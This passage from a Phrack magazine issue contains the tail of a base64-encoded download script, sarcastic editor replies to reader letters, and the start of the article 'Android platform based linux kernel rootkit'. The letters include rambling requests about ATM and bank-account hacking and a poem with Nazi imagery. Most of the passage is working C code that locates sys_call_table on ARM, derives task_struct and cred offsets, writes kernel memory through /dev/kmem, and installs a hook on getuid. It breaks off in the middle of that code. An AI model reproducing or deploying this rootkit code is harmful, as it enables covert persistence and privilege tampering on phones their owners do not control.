CgllbHNlCiAgICAgICAgICAgICAgICBlY2hvICJFeHRyYWN0aW9uIGZhaWxl
|
|
ZCIKICAgICAgICBmaQp9Cgpmb3IgKCggeD0xOyB4PCRDVVJJU1NVRTsgeCsr
|
|
ICkpOyBkbwoJaWYgWyAtZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
|
|
IF07IHRoZW4KCWVjaG8gIklzc3VlICR4IGV4aXN0cyIKCQlpZiBbIC1lICR7
|
|
RVpJTkVESVJ9JHt4fSBdOyB0aGVuCgkJCWVjaG8gIklzc3VlIHByZXZpb3Vz
|
|
bHkgZXh0cmFjdGVkIgoJCWVsc2UKCQkJZWNobyAiRXh0cmFjdGluZyBJc3N1
|
|
ZSAkeCIKCQkJdGFyIHp4ZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
|
|
CgkJCWV4aXRzdGF0CgkJZmkKCWVsc2UKCgkJZWNobyAiRG93bmxvYWRpbmcg
|
|
aXNzdWUgJHggLi4uLiIKCQlHRVQgJHtVUkx9cGhyYWNrJHt4fS50YXIuZ3og
|
|
PiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6CgkJZWNobyAiRG9uZSBk
|
|
b3dubG9hZGluZyBpc3N1ZSAkeCAuLi4uIgoJCWVjaG8gIkV4dHJhY3Rpbmcg
|
|
aXNzdWUgJHgiCgkJdGFyIHp4dmYgJHtFWklORURJUn1waHJhY2ske3h9LnRh
|
|
ci5negoJCWV4aXRzdGF0CglmaQpkb25lICAK
|
|
====
|
|
|
|
---
|
|
|
|
From: Tom <thom128@gmail.com>
|
|
Subject: Phrack Rules The World!
|
|
|
|
Hi there,
|
|
|
|
I like hacking but I never done it.
|
|
|
|
[ So how do you know that you like it? ]
|
|
|
|
Wrote a poem about it.
|
|
|
|
[ Was it worth it? ]
|
|
|
|
I wanna work in IT as systems admin.
|
|
|
|
[ Hem... ok? Why? :) ]
|
|
|
|
Please publish my poem in your magazine.
|
|
|
|
[ Done! ]
|
|
|
|
Phrack Rules!
|
|
|
|
[ Sure it does! ]
|
|
|
|
Heil from London, England.
|
|
|
|
Razor Tech Warrior
|
|
|
|
They told you that you were nothing
|
|
Just another name and number
|
|
They said you were dumb and dumber
|
|
|
|
But you stole
|
|
Their lives away
|
|
Network Nazi
|
|
Live to fight another day
|
|
|
|
[ Network Nazi Live to fight another day <-- WTF ???? ]
|
|
|
|
Through the black
|
|
Of the nights metal sheets
|
|
In tower blocks and tenements
|
|
Cyber crime it breeds
|
|
|
|
The government will stomp you out
|
|
But burn their kernel
|
|
Lock it down
|
|
While others are still asleep.
|
|
|
|
[ We are speechless. All we can say is: LOL. ]
|
|
|
|
---
|
|
|
|
From: Tom <thom***@gmail.com>
|
|
Subject: Some Photos From London
|
|
|
|
Hi there,
|
|
|
|
Just thought i would send u some pics of me and my family/friends. i love
|
|
the mag am a big fan...keep up the good work.
|
|
|
|
[ And he really sent us pics. Your Grandma seems nice btw but you look
|
|
like a virgin geek unfortunately :( ]
|
|
|
|
---
|
|
|
|
From: b-fox <*****@bol.com.br>
|
|
Subject: Hey... Mother fucker
|
|
|
|
[ Hey. p0rn industry calls it MILF fucking ]
|
|
|
|
Wait my document... I'm gonna write I paper today about/regarding bomb
|
|
development and something abt legislation in general. Huge hug!
|
|
|
|
[ Priceless. :') ]
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0E - Shame Shame Shame.......shame on you ]=---------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: varenya mehta <varenya2007@yahoo.co.in>
|
|
Subject: ANTISPAM
|
|
|
|
Run both ethernet and phone over existing Cat-5 cable
|
|
|
|
[ Cool! New submission! \o/ ]
|
|
|
|
The new fad when building a house is to run Cat-5 cable to every wall jack.
|
|
These jacks can then be used for either ethernet or phone. When we got our
|
|
new house built, we chose to get four of these jacks, and we intended to
|
|
use them for phone service. Unfortunately, the wifi is a bit flaky in
|
|
places (even with two access points.) This got annoying up until the point
|
|
where three of the four wall jacks were being used for ethernet, leaving
|
|
just one for phone. This was a problem.
|
|
|
|
The solution is to run both ethernet and phone over the same existing cat-5
|
|
cable. Every wall jack becomes two jacks, one RJ-11 for phone and one RJ-45
|
|
for ethernet. This neat hack could save you a lot of money, as you only
|
|
have to buy new wall plates and jacks rather than wall plates, jacks, and
|
|
hundreds of feet of wire.
|
|
|
|
[ Really cool hack. This one may fit in the linenoise :) ]
|
|
|
|
[...]
|
|
|
|
Also note that this procedure will not work with PoE (Power over Ethernet)
|
|
devices. Nothing bad will happen, it just won't transmit power. See step 13
|
|
for apossibly unsafe way to keep your PoE and add phone service. Also, it
|
|
will not work with gigabit ethernet-- gigabit ethernet uses all four pairs.
|
|
It will work fine at 10/100 Mbps which is sufficient for most people
|
|
|
|
[ Wait! Something is wrong. What is step13 and aren't a few things
|
|
missing? Let's google() a bit...
|
|
|
|
@(X_X)@
|
|
|
|
http://www.instructables.com/id/Hack-your-House-Run-both-ethernet-
|
|
and-phone-over-/
|
|
|
|
So not only did you send us a ripped paper. But you idiot were not
|
|
smart enough to click on "Next step" to copy the whole. LOL. ]
|
|
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
P.S. -please reply whether my submission will be added or not in this
|
|
edition of ur highly esteemed Phrack magazine...loking forward to your
|
|
reply :)
|
|
cheers
|
|
|
|
[ Ur highly esteemed Phrack magazine would recommend to go shoot
|
|
yourself. ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0F - Insanity or SPAM??? ]=--------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
---
|
|
|
|
From: John Smith <devils-advocate-666@live.com>
|
|
Subject: Dear staff(at)phrack[DOT]org; I love what you guys do for the
|
|
U.S.A! Can you email your e news letters too please? Thank you.
|
|
|
|
Can you please add me to your e-news letter list, so that I can recieve new
|
|
updates from your cite? I totally loved what you guys had written about ai,
|
|
and mind hacking and about hacking for the U.S. and Cypher Punks & Ninja
|
|
Strike Force! Best of luck to all of you staff members at Phrack! I would
|
|
like to know if you guys could please email me back some information in
|
|
regards about rsome bank accounts that was on CRYPTOME, or if you guys
|
|
could tell me about how you all had cash flow that came from hacked ATM
|
|
terminals that you guys had done remotely, because I need to be hacking
|
|
systems right now and I had all of my stuff jacked and I was robbed with
|
|
all of your softwares that I had for CIA/ NSA and I've been trying to log
|
|
onto some banking systems for my CIA/ NSA digital cash, or could you guys
|
|
send me some lock picks, or DIE BOLD keys to open some safes and vaults or
|
|
could you send me some Cypher Punks white paiges or other instructions to
|
|
interceptor frozen accounts on line and or how to obtain money for starting
|
|
a Cypher Punks EBB & FLO system to develope an agriculture business plan
|
|
that will help finance money for CIA & NSA op (ie- with IQT and with
|
|
Foresight Nanotechnology Institute and with CTBA.org) to counter the HASHID
|
|
culture? Such as GSPC in Morocco and in Algeria, GIA, FIS, ETI, AQIM,
|
|
Sahel Pan, DR-CONGO, AQAP, Hezbollah, HAMAS, Hizbullah, IMU, and fighting
|
|
against the salafyists in the Magreb's EU-Arabia HASHID zones, and against
|
|
the EVIL EMPIRE's MOIS, MEK, MEKO, PKK, VEVAK, ISI, FSB, KGB, NAK, GRU, and
|
|
Brazillian Guerillas and Chychenian Rebels and mob and Russian Mob for
|
|
GAZPROM Russian Mob Oil Monopoly and countering all of these groups members
|
|
and contacts and countering their economic insugernt threats
|
|
internationally, by hacking into their networks and locating them with RNM
|
|
ai, and blood clotting the Evil Empire, and moving and on the GO like CIA
|
|
backing the "Wrath of GOD" and with the Cult of CIA's MKULTRA program, and
|
|
I mean redndering synapsial "WET WORK" by taking their ballance with the
|
|
"EXIT BLOW," for NSA/ CIA's Ninja Strike Force and I want to be taking our
|
|
threats to the Land of Snow and flurries will show me to the rest of their
|
|
Evil Empires members locations by terminating them with Illuminati and I'll
|
|
be hacking their minds and their bank accounts and stealing all of their
|
|
wealth and contacts and other intelligence for RED Team, and taking their
|
|
materials as loot, and sending it onto an encrypted site, but I want to
|
|
creat my own ai online site with grant.gov grant money asap, and then once
|
|
that's done I can go and locate them with RNM ai, but I would like aving
|
|
somean ai quantum consciousness program with a self assembling "FOG" EW ai
|
|
HDD quantum computer with an infinite memory that would allow me to hack
|
|
bank accounts with an ip installed with nano-bio-technologies with inner
|
|
cellular blood vessel programming and cellular mind net morphing
|
|
technologies with RNM, nanotechnology made with a neuronal networking and
|
|
has a 3-d holographic video and 3-d holographic audio with real world and
|
|
mirror world ai 3-d/ 4-d softwares for an online Cypher Punks & Ninja
|
|
Strike Force & Cult of Dead Cow members with other CIA/ NSA Intelligence
|
|
Analysis Cammander's of Red Teaming (aka- COUNTER-INTELLIGENCE TEAM's ALPHA
|
|
& BRAVO:) Black Ops- Red Teaming forum with an ai 3-d GOOGLE EARTH PRO GPS
|
|
softwares with a soft mobi GLOBAL IP softwares package STEALTH NINJA phone
|
|
with SIG PRO Telecommunications softwares for NSA & CIA CT:qto let me know
|
|
about a should
|
|
|
|
Tchao with Respect-
|
|
Fabian.
|
|
|
|
[ What the fuck is that shit??? ]
|
|
|
|
---
|
|
|
|
From: John Smith <devils-advocate-666@live.com>
|
|
Subject: ANTISPAM
|
|
|
|
[ Hey it's you again! ]
|
|
|
|
Dear Phrack magazine,
|
|
Hello my name is SA John Smith, I'm from No Town, VA. but moved to
|
|
Brosnan, Missouri a few years back, and just recently moved to the huge
|
|
L.A.; but, I would like to discuss some about covering some articles
|
|
about Konkrete Jungle music parties and drum and bass massives done
|
|
internationally, to help promote Cypher Punks Ebb & Flo Garden's and
|
|
to help promote Covert Operations and Covert Actions for Cypher Punks,
|
|
Ninja Strike Force, CIA MK-ULTRA and Red Teaming financing and donation
|
|
sources to do shadowing, spike zones, drop deads, and some net working
|
|
for some brush offs of information, softwares, and to cache equipment
|
|
and personell at Squats (ie- abbandonned buildings, subway stations,
|
|
subterrainean tunnels, Ligne Imagineaux types of areas, beach houses,
|
|
Four Seasons Resort, casino's, Def Con Seminar, yahts, and other jungle
|
|
music parties and be for the U.S. like the Maquis- WWII French Resistance,
|
|
OSS, OAS, SIS, CSIS, CIA, Mossad, Shin Bet, NSA, and others from NATO and
|
|
U.S. Coalition Forces, and some U.N. Merc's and other types of PMCS's
|
|
Mercenaries for hire;) But, also covering atm hacking, to recieve cash
|
|
and Flow in Game Theory like doing Parkour tricks in Mirror's Edge for
|
|
Intelligence Analysis Red Team Well, I gotta go now, best wishes to you
|
|
all, and I'll contact you again, or better yet, just contact me with ai,
|
|
and we can meet up.
|
|
|
|
Tchao-
|
|
The Devils Advocate.
|
|
|
|
[ Spamming or brainfucked? ]
|
|
|
|
|--=[ EOF ]=-------------------------------------------------------------=|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------=[ Android platform based linux kernel rootkit ]=-----------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=|
|
|
|=------------------------=[ April 04th 2011 ]=--------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
--[ Contents
|
|
|
|
1 - Introduction
|
|
|
|
2 - Basic techniques for hooking
|
|
2.1 - Searching sys_call_table
|
|
2.2 - Identifying sys_call_table size
|
|
2.3 - Getting over the problem of structure size in kernel versions
|
|
2.4 - Treating version magic
|
|
|
|
3 - sys_call_table hooking through /dev/kmem access technique
|
|
|
|
4 - modifying sys_call_table handle code in vector_swi handler routine
|
|
|
|
5 - exception vector table modifying hooking techniques
|
|
5.1 - exception vector table
|
|
5.2 - Hooking techniques changing vector_swi handler
|
|
5.3 - Hooking techniques changing branch instruction offset
|
|
|
|
6 - Conclusion
|
|
|
|
7 - References
|
|
|
|
8 - Appendix: earthworm.tgz.uu
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
This paper covers rootkit techniques that can be used in the linux kernel
of the Android platform, which runs on ARM (Advanced RISC Machine)
processors. All the tests in this paper were performed on a Motoroi XT720
(2.6.29-omap1 kernel) and a Galaxy S SHW-M110S (2.6.32.9 kernel). Note that
some contents may not apply to all smartphone platforms and that a few bugs
are left for you to fix.
|
|
|
|
We have seen various linux kernel hooking techniques from some pioneers
([1][2][3][4][5]). I am especially grateful to Silvio Cesare and sd, who
introduced and developed the /dev/kmem technique. Read the references for
more information.
|
|
|
|
In this paper, we are going to discuss a few hooking techniques.
|
|
|
|
1. Simple and traditional hooking technique using kmem device.
|
|
2. Traditional hooking technique changing sys_call_table offset in
|
|
vector_swi handler.
|
|
3. Two newly developed hooking techniques changing interrupt
|
|
service routine handler in exception vector table.
|
|
|
|
The main concepts behind the techniques in this paper are 'smart' and
'simple': the focus is on hooking while modifying as little kernel memory
as possible, in the simplest possible way. As with the good techniques of
the past, it must be possible to hook freely both before and after the
system call.
|
|
|
|
This paper consists of eight parts, and for the readers' convenience I
have tried to supply various examples in abundant appendices. The example
code is written for the ARM architecture, but with some modifications it
can also be used on the ia32 architecture, and even in environments that do
not support LKM.
|
|
|
|
|
|
--[ 2 - Basic techniques for hooking
|
|
|
|
sys_call_table is a table which stores the addresses of the low-level
system call routines. Most classical hooking techniques tamper with
sys_call_table in one way or another. Because of this, protections such as
hiding the symbol and moving the table into a read-only section have been
adopted to defend sys_call_table against attackers. These protections,
however, can easily be bypassed if an attacker uses the kmem device access
technique. Discussing other techniques that render such protections useless
is beyond the scope of this paper.
|
|
|
|
|
|
--[ 2.1 - Searching sys_call_table
|
|
|
|
If the sys_call_table symbol is not exported and there is no sys_call_table
entry in the kallsyms file, which contains the kernel symbol table, it is
difficult to get the sys_call_table address, which varies with each version
of the platform kernel. So, we need a way to get the address of
sys_call_table without symbol table information.
|
|
|
|
Similar techniques can be found on the web[10]; apart from those, the code
in this paper was adapted to the Android platform in the course of testing.
|
|
|
|
|
|
--[ 2.1.1 - Getting sys_call_table address in vector_swi handler
|
|
|
|
First, I will introduce two ways to get the sys_call_table address. The
code introduced here depends on the interrupt implementation of the ARM
processor.

Generally, on an ARM processor, when an interrupt or exception occurs,
execution branches into the exception vector table. The exception vector
table holds the handler addresses matching each exception handler routine.
The kernel of the current Android platform uses the high vector
(0xffff0000), and at 0xffff0008, offset 0x08, there is a 4 byte instruction
that branches to the software interrupt handler. When that instruction
runs, execution jumps to the software interrupt handler whose address is
stored at 0xffff0420, offset 0x420. See section 5.1 for more information.
|
|
|
|
void get_sys_call_table(){
|
|
void *swi_addr=(long *)0xffff0008;
|
|
unsigned long offset=0;
|
|
unsigned long *vector_swi_addr=0;
|
|
unsigned long sys_call_table=0;
|
|
|
|
offset=((*(long *)swi_addr)&0xfff)+8;
|
|
vector_swi_addr=*(unsigned long *)(swi_addr+offset);
|
|
|
|
while(vector_swi_addr++){
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xfffff000)==0xe28f8000){
|
|
offset=((*(unsigned long *)vector_swi_addr)&
|
|
0xfff)+8;
|
|
sys_call_table=(void *)vector_swi_addr+offset;
|
|
break;
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
|
|
First, this code gets the address of the vector_swi routine (the software
interrupt exception handler) from the exception vector table at the high
vector, and then locates the code that handles the sys_call_table address.
The following is part of the vector_swi handler code.
|
|
|
|
000000c0 <vector_swi>:
|
|
c0: e24dd048 sub sp, sp, #72 ; 0x48 (S_FRAME_SIZE)
|
|
c4: e88d1fff stmia sp, {r0 - r12} ; Calling r0 - r12
|
|
c8: e28d803c add r8, sp, #60 ; 0x3c (S_PC)
|
|
cc: e9486000 stmdb r8, {sp, lr}^ ; Calling sp, lr
|
|
d0: e14f8000 mrs r8, SPSR ; called from non-FIQ mode, so ok.
|
|
d4: e58de03c str lr, [sp, #60] ; Save calling PC
|
|
d8: e58d8040 str r8, [sp, #64] ; Save CPSR
|
|
dc: e58d0044 str r0, [sp, #68] ; Save OLD_R0
|
|
e0: e3a0b000 mov fp, #0 ; 0x0 ; zero fp
|
|
e4: e3180020 tst r8, #32 ; 0x20 ; this is SPSR from save_user_regs
|
|
e8: 12877609 addne r7, r7, #9437184; put OS number in
|
|
ec: 051e7004 ldreq r7, [lr, #-4]
|
|
f0: e59fc0a8 ldr ip, [pc, #168] ; 1a0 <__cr_alignment>
|
|
f4: e59cc000 ldr ip, [ip]
|
|
f8: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0} ; update control register
|
|
fc: e321f013 msr CPSR_c, #19 ; 0x13 enable_irq
|
|
100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk
|
|
104: e1a09689 mov r9, r9, lsl #13
|
|
[*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer
|
|
10c: e599c000 ldr ip, [r9] ; check for syscall tracing
|
|
|
|
The asterisked line is the code that loads sys_call_table: it computes the
start of sys_call_table as a fixed offset from the current pc. So, if we
can find the opcode pattern corresponding to the "add r8, pc" instruction,
we can extract that offset and figure out the position of sys_call_table.
|
|
|
|
opcode: 0xe28f8???
|
|
|
|
if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){
|
|
offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8;
|
|
sys_call_table=(void *)vector_swi_addr+offset;
|
|
break;
|
|
|
|
From this, we can get the address of sys_call_table handled in
|
|
vector_swi handler routine. And there is an easier way to do this.
|
|
|
|
|
|
--[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching
|
|
|
|
The second way to get the address of sys_call_table is simpler than the
one introduced in 2.1.1. It uses the fact that the address of sys_close,
whose symbol is exported, is stored at offset 6 (the sixth entry) from the
starting point of sys_call_table.
|
|
|
|
... the same vector_swi address searching routine parts omitted ...
|
|
|
|
while(vector_swi_addr++){
|
|
if(*(unsigned long *)vector_swi_addr==&sys_close){
|
|
sys_call_table=(void *)vector_swi_addr-(6*4);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
Since sys_call_table resides after the vector_swi handler code, we can
scan forward for the address of sys_close, which is registered as the sixth
system call in sys_call_table.
|
|
|
|
fs/open.c:
|
|
EXPORT_SYMBOL(sys_close);
|
|
...
|
|
|
|
call.S:
|
|
/* 0 */ CALL(sys_restart_syscall)
|
|
CALL(sys_exit)
|
|
CALL(sys_fork_wrapper)
|
|
CALL(sys_read)
|
|
CALL(sys_write)
|
|
/* 5 */ CALL(sys_open)
|
|
CALL(sys_close)
|
|
|
|
This search method has the disadvantage that, when it is implemented in
user mode, the sys_close kernel symbol address must be obtained beforehand.
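
For completeness, here is a minimal user-mode sketch of such a lookup
through /proc/kallsyms; lookup_ksym() is a hypothetical helper, not part of
the attached code, and it assumes kallsyms is readable and exposes real
addresses on the target:

#include <stdio.h>
#include <string.h>

/* resolve an exported kernel symbol (e.g. "sys_close") by scanning
   /proc/kallsyms; returns 0 if the symbol is not found */
unsigned long lookup_ksym(const char *name)
{
        FILE *f=fopen("/proc/kallsyms","r");
        unsigned long addr=0;
        char line[256],type,sym[128];

        if(!f)
                return 0;
        while(fgets(line,sizeof(line),f)){
                if(sscanf(line,"%lx %c %127s",&addr,&type,sym)==3&&
                   !strcmp(sym,name)){
                        fclose(f);
                        return addr;
                }
        }
        fclose(f);
        return 0;
}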
|
|
|
|
|
|
--[ 2.2 - Identifying sys_call_table size
|
|
|
|
The hooking technique introduced in section 4 changes the sys_call_table
handling code within the vector_swi handler. It generates a copy of the
existing sys_call_table in kernel heap memory. Because the size of
sys_call_table varies between platform kernel versions, we need the precise
size of sys_call_table to generate that copy.
|
|
|
|
... the same vector_swi address searching routine parts omitted ...
|
|
|
|
while(vector_swi_addr++){
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xffff0000)==0xe3570000){
|
|
i=0x10-(((*(unsigned long *)vector_swi_addr)&
|
|
0xff00)>>8);
|
|
size=((*(unsigned long *)vector_swi_addr)&
|
|
0xff)<<(2*i);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
This code searches the vector_swi routine for the instruction that checks
the size of sys_call_table and then decodes its immediate operand, which is
the size of sys_call_table. The following listing shows that check; it is
part of the code that dispatches the system call stored in sys_call_table.
|
|
|
|
118: e92d0030 stmdb sp!, {r4, r5} ; push fifth and sixth args
|
|
11c: e31c0c01 tst ip, #256 ; are we tracing syscalls?
|
|
120: 1a000008 bne 148 <__sys_trace>
|
|
[*]124: e3570f5b cmp r7, #364 ; check upper syscall limit
|
|
128: e24fee13 sub lr, pc, #304 ; return address
|
|
12c: 3798f107 ldrcc pc, [r8, r7, lsl #2] ; call sys_* routine
|
|
|
|
The asterisked line compares against the size of sys_call_table: it checks
whether the r7 register, which holds the system call number, exceeds the
syscall limit. So, if we search for the opcode pattern (0xe357????)
corresponding to "cmp r7", we can get the exact size of sys_call_table.
Note that the immediate operand is encoded the ARM way, as an 8-bit value
rotated right by twice the 4-bit rotate field, which is exactly what the
decoding code above undoes.
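
As a worked example of that encoding, here is a small decoding sketch
(decode_arm_imm() is only an illustration, not part of the attached code):

/* ARM data-processing immediate: an 8-bit value rotated right by
   twice the 4-bit rotate field in bits 11-8 of the instruction */
unsigned long decode_arm_imm(unsigned long insn)
{
        unsigned long rot=((insn&0xf00)>>8)*2;
        unsigned long imm=insn&0xff;

        return rot?((imm>>rot)|(imm<<(32-rot))):imm;
}

/* e.g. 0xe3570f5b ("cmp r7, #364"): rot=30, imm=0x5b,
   0x5b ror 30 == 0x5b << 2 == 364 sys_call_table entries */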
|
|
|
|
|
|
--[ 2.3 - Getting over the problem of structure size in kernel versions
|
|
|
|
Even between kernels of the same version, structure sizes vary according
to the compile environment and config options. Thus, if we use a structure
layout with the wrong size, the code is not likely to work as expected. To
prevent errors caused by differing structure offsets and to let our code
work in various kernel environments, we need to build a function which
derives the needed offsets from the structures at run time.
|
|
|
|
void find_offset(void){
|
|
unsigned char *init_task_ptr=(char *)&init_task;
|
|
int offset=0,i;
|
|
char *ptr=0;
|
|
|
|
/* getting the position of comm offset
|
|
within task_struct structure */
|
|
for(i=0;i<0x600;i++){
|
|
if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&&
|
|
init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&&
|
|
init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&&
|
|
init_task_ptr[i+6]=='r'){
|
|
comm_offset=i;
|
|
break;
|
|
}
|
|
}
|
|
/* getting the position of tasks.next offset
|
|
within task_struct structure */
|
|
init_task_ptr+=0x50;
|
|
for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){
|
|
offset=*(long *)init_task_ptr;
|
|
if(offset&&offset>0xc0000000){
|
|
offset-=i;
|
|
offset+=comm_offset;
|
|
if(strcmp((char *)offset,"init")){
|
|
continue;
|
|
} else {
|
|
next_offset=i;
|
|
|
|
/* getting the position of parent offset
|
|
within task_struct structure */
|
|
for(;i<0x300;i+=4,init_task_ptr+=4){
|
|
offset=*(long *)init_task_ptr;
|
|
if(offset&&offset>0xc0000000){
|
|
offset+=comm_offset;
|
|
if(strcmp
|
|
((char *)offset,"swapper"))
|
|
{
|
|
continue;
|
|
} else {
|
|
parent_offset=i+4;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
/* getting the position of cred offset
|
|
within task_struct structure */
|
|
init_task_ptr=(char *)&init_task;
|
|
init_task_ptr+=comm_offset;
|
|
for(i=0;i<0x50;i+=4,init_task_ptr-=4){
|
|
offset=*(long *)init_task_ptr;
|
|
if(offset&&offset>0xc0000000&&offset<0xd0000000&&
|
|
offset==*(long *)(init_task_ptr-4)){
|
|
ptr=(char *)offset;
|
|
if(*(long *)&ptr[4]==0&&
|
|
*(long *)&ptr[8]==0&&
|
|
*(long *)&ptr[12]==0&&
|
|
*(long *)&ptr[16]==0&&
|
|
*(long *)&ptr[20]==0&&
|
|
*(long *)&ptr[24]==0&&
|
|
*(long *)&ptr[28]==0&&
|
|
*(long *)&ptr[32]==0){
|
|
cred_offset=i;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
/* getting the position of pid offset
|
|
within task_struct structure */
|
|
pid_offset=parent_offset-0xc;
|
|
|
|
return;
|
|
}
|
|
|
|
This code gets information about the PCB (process control block) using
some features of the task_struct structure that can serve as search
patterns.

First, we search init_task, the task created before the init process, for
the process name "swapper" in order to find the offset of the "comm"
variable within task_struct. Then, we look for the "next" pointer of
"tasks", the linked list of process structures, and use the "comm" variable
to check whether the candidate process is named "init". If it is, we have
found the offset of the "next" pointer.
|
|
|
|
include/linux/sched.h:
|
|
struct task_struct {
|
|
...
|
|
struct list_head tasks;
|
|
...
|
|
pid_t pid;
|
|
...
|
|
struct task_struct *real_parent; /* real parent process */
|
|
struct task_struct *parent; /* recipient of SIGCHLD,
|
|
wait4() reports */
|
|
...
|
|
const struct cred *real_cred; /* objective and
|
|
real subjective task
|
|
* credentials (COW) */
|
|
const struct cred *cred; /* effective (overridable)
|
|
subjective task */
|
|
struct mutex cred_exec_mutex; /* execve vs ptrace cred
|
|
calculation mutex */
|
|
|
|
char comm[TASK_COMM_LEN]; /* executable name ... */
|
|
|
|
After this, we find the parent pointer by checking candidate pointers: a
correct parent pointer points back to the previous task (init_task), whose
process name is "swapper". The reason we search for the parent pointer is
to derive the offset of the pid variable, using the parent offset as a base
point.

To get the position of the cred structure pointer, which is related to task
privileges, we search backwards from the comm variable and check that every
user id in the candidate structure is 0.
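
To illustrate how the discovered offsets are then put to work, here is a
minimal sketch that walks the task list looking for a process by name;
find_task_by_name() is hypothetical and assumes find_offset() has already
filled comm_offset and next_offset:

unsigned long find_task_by_name(char *name)
{
        unsigned char *task=(unsigned char *)&init_task;

        do{
                if(!strcmp((char *)(task+comm_offset),name))
                        return (unsigned long)task;
                /* tasks.next points at the next task's list_head, so
                   step back by next_offset to reach its task_struct */
                task=(unsigned char *)
                        (*(unsigned long *)(task+next_offset)-next_offset);
        }while(task!=(unsigned char *)&init_task);

        return 0;
}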
|
|
|
|
|
|
--[ 2.4 - Treating version magic
|
|
|
|
Check the Defcon 18 whitepaper[11] by Christian Papathanasiou and Nicholas
J. Percoco. It introduces a way of dealing with the version magic by
modifying the utsrelease.h header when compiling the LKM rootkit module. In
fact, even before they presented, I had been using a tool which overwrites
the vermagic value of a compiled kernel module binary directly.
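
In practice the utsrelease.h trick boils down to overriding UTS_RELEASE
with the victim kernel's release string before building the module; the
value below is only an example taken from the Motoroi kernel mentioned
earlier and must of course match the target (check /proc/version):

/* include/linux/utsrelease.h (include/generated/utsrelease.h on newer
   trees), replaced in the build tree before compiling the LKM */
#define UTS_RELEASE "2.6.29-omap1"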
|
|
|
|
|
|
--[ 3 - sys_call_table hooking through /dev/kmem access technique
|
|
|
|
I hope you take this section as a warm-up. For more detailed background on
the /dev/kmem access technique, check "Run-time kernel patching" by Silvio
and "Linux on-the-fly kernel patching without LKM" by sd.

At least for now, root access to the /dev/kmem device is still allowed in
the linux kernel of the Android platform. So, it is possible to seek with
lseek() and to read with read(). The newly written /dev/kmem access
routines are as follows.
|
|
|
|
#define MAP_SIZE 4096UL
|
|
#define MAP_MASK (MAP_SIZE - 1)
|
|
|
|
int kmem;
|
|
|
|
/* read data from kmem */
|
|
void read_kmem(unsigned char *m,unsigned off,int sz)
|
|
{
|
|
int i;
|
|
void *buf,*v_addr;
|
|
|
|
if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
|
|
MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
|
|
perror("read: mmap error");
|
|
exit(0);
|
|
}
|
|
for(i=0;i<sz;i++){
|
|
v_addr=buf+(off&MAP_MASK)+i;
|
|
m[i]=*((unsigned char *)v_addr);
|
|
}
|
|
if(munmap(buf,MAP_SIZE*2)==-1){
|
|
perror("read: munmap error");
|
|
exit(0);
|
|
}
|
|
return;
|
|
}
|
|
|
|
/* write data to kmem */
|
|
void write_kmem(unsigned char *m,unsigned off,int sz)
|
|
{
|
|
int i;
|
|
void *buf,*v_addr;
|
|
|
|
if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
|
|
MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
|
|
perror("write: mmap error");
|
|
exit(0);
|
|
}
|
|
for(i=0;i<sz;i++){
|
|
v_addr=buf+(off&MAP_MASK)+i;
|
|
*((unsigned char *)v_addr)=m[i];
|
|
}
|
|
if(munmap(buf,MAP_SIZE*2)==-1){
|
|
perror("write: munmap error");
|
|
exit(0);
|
|
}
|
|
return;
|
|
}
|
|
|
|
This code maps the desired kernel memory address into user memory, two
pages at a time, so that we can read and write kernel memory simply by
reading and writing the shared mapping. Even though the sys_call_table we
located is allocated in a read-only area, we can still modify its contents
through the /dev/kmem access technique. An example of hooking by modifying
sys_call_table is as follows.
|
|
|
|
kmem=open("/dev/kmem",O_RDWR|O_SYNC);
|
|
if(kmem<0){
|
|
return 1;
|
|
}
|
|
...
|
|
if(c=='I'||c=='i'){ /* install */
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_getuid");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4);
|
|
